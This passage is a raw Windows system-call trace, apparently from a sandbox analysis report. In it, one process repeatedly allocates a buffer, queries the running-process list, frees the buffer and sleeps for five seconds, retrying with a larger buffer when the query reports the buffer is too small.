AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.900] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.916] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.931] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.947] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.961] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.993] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.008] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.042] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.057] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.106] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.118] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.133] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.149] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.182] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.196] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.211] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.244] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.259] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.275] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.290] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.326] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.336] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.352] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.368] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.385] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.400] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.415] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.432] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0143.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0143.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0143.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0143.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0143.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0143.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0143.450] 